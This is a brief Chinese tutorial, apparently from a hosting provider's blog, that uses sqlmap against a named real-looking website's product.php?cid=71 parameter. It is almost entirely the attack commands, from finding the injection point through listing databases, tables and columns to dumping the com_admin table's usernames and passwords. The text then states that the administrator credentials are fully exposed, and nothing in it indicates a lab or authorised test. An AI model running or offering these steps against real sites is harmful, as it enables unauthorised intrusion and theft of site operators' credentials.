用sqlmap进行注入
1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。
sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71”
可以看出此处存在sql注入漏洞。
2、
sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”
--dbs 可以跑出存在的数据库名
然后可以跑gaoneng数据库中的表
Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables
既然已经爆出数据库里的表,那就可以爆出表中的字段
Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin --columns
可以看到这个表中存在我们需要的字段,密码与用户名
Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin -C username,password --dump
由此这个网站的管理员密码与用户名已被完全爆出。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。